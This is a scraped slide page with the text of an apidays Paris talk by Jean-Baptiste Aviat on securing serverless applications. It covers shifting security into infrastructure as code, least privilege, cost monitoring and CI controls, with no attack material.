Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 

apidays LIVE Paris - Serverless security: how to protect what you don't see? by Jean Baptiste Aviat

  • 1.
  • 2. Jean-Baptiste Aviat CTO & Co-founder Former (Red Team) Email: jb@sqreen.io Twitter: @jbaviat Podcast:
  • 3. What is Serverless? And why is it different?
  • 4. Business logic 100% written by developersDev Ops Code ⭐⭐⭐⭐⭐ Ops ⭐
  • 5. Auth File upload Business service #1 Business service #2 Push service Async workers Dev Ops Code ⭐⭐⭐ Ops ⭐⭐⭐
  • 8. Ad-hoc usage: easier to deploy Dynamically configure cloud elements, transform data on the go, comply to cloud vendors requirements. Teams use it to circumvent processes / CI / deploy. Native serverless applications Build applications designed for serverless infrastructures.
  • 9. How does serverless impacts security?
  • 10. Dev Sec Ops Dev Sec Ops Dev Sec Ops Serverless forces bridging dev, sec & ops Monolithic app Microservices Serverless
  • 11. What “serverless” means is moving too fast Edge serverless, ad-hoc, infra Scale is different (1 monolithic app → 5 micro services → 100 serverless functions) No tool allows to visualize all of your lambas at once (and the spreadsheet doesn’t work for this scale and pace!) The space didn’t reach maturity yet: ● No commonly accepted best practices, but a broad variety of best practices ● Evolving fast
  • 13. New challenges 🚨: ● No way to visualize deployments ● Best practices still change rapidly ● Entrypoints vary widely (HTTP? Queue? Stream? Database?) ● Higher coupling to the cloud provider requires high cloud security Solved challenges ✅: ● System updates (unless Docker based!) ● Network level security (mTLS, …) Scaling challenges 🤯: ● Developers do 20 ⨉ more ops ● 1 microservice = 20 ⨉ functions ● 20 ⨉ vulnerable dependencies? ● 20 ⨉ ownership tracking? ● 20 ⨉ threat modeling? ● 20 ⨉ faster new function appearance? ⨉
  • 15. Use infrastructure as code (Terraform, cloud formation, …) Shift your infrastructure left ● With serverless, a part of the business logic is handled by the infrastructure ● Serverless app developers own both the code and a part of the infrastructure Use principle of least privilege for your lambdas (but with reasonable granularity!) Monitor your costs (and be ready to block abuses) * Network, encryption, mutual authentication is mostly ensured by proper cloud services usage. But is much simpler than for microservices*
  • 16. Keep best practices Injections Vulnerable dependencies Lack of monitoring AuthN / AuthZ issues OWASP top 10 Scalability & coherency Design strong functions frameworks (CI, deployment, logging frameworks, …) NEW
  • 17. New functions appear and disappear at a highest rate than ever Leverage developer’s tools as much as possible to: ● Monitor security controls are applied ● Monitor the permissions used ● Ensure production doesn’t drift vs IaC IaC / Terraform make it easy to inspect IaC / Terraform allows to apply static control (and break CI if needed) Cloud APIs allow to dynamically list and inspect running containers
  • 18. ● Maintain the OWASP top 10 ● Adopt a strong cloud security posture ● Generalize principle of least privilege ● Ensure serverless projects use IaC (Terraform, CloudFormation, …) ● Leverage cloud APIs to automate controls and monitoring ● Monitor serverless cost ● Ensure coherency amongst functions deployments OWASP top 10 Cloud security posture Serverless cost monitoring Unified deployments
  • 19. Use Serverless framework or Terraform ● With safe, relevant examples ● Coupled with CI Provide relevant & safe code examples ● Using ORM / validation / log / … ● Coupled with CI Prepare provisioning for: ● A working deployment ● CI job to deploy & run linting / static analysers Document how to deploy secrets Git repositories best practices: ● Mandatory pull requests ● Require a CODEOWNERS file ● Lock master
  • 20. Serverless shifts complexity from application code to the infrastructure. Serverless doesn’t mean no ops but: ● Different kind of ops are done by different personas ● Ops are much simpler compared to micro services (mTLS, peer to peer, etc.) Some security risks occur more (20 times!), some appear, and a few disappear. Cloud security takes a much more important stance. Scaling development practices (CI, CD, frameworks, BoM) becomes a requirement
  • 21.
  • 22. CSA - The 12 Most Critical Risks for Serverless Applications OWASP top 10 OWASP serverless top 10 Serverless framework Terraform, CloudFormation CODEOWNERS (Github, Gitlab) AppSec Builders podcast Or get in touch / ask me directly: Email: jb@sqreen.io Twitter: @jbaviat Podcast:
  • 23.
  • 24. Credits to Theodo Credits to Marcin Credits to https://twitter.com/alex_frantic?lang=en Podcast
  • 26. Future More edge More glue 2016 Google Cloud Functions Azure Functions IBM Cloud Functions AWS Lambda @Edge 2014 AWS Lambda 2017 Cloudflare workers 2008 Google App Engine 2019 Fastly Edge workers 2020 Netlify functions
  • 27. “ we are discovering new services, tools and patterns weekly ” Source: any serverless specialist.
  • 28. Easier & faster to deploy Move from “your code does it all” towards “your code does the business logic, your Cloud Provider is the glue”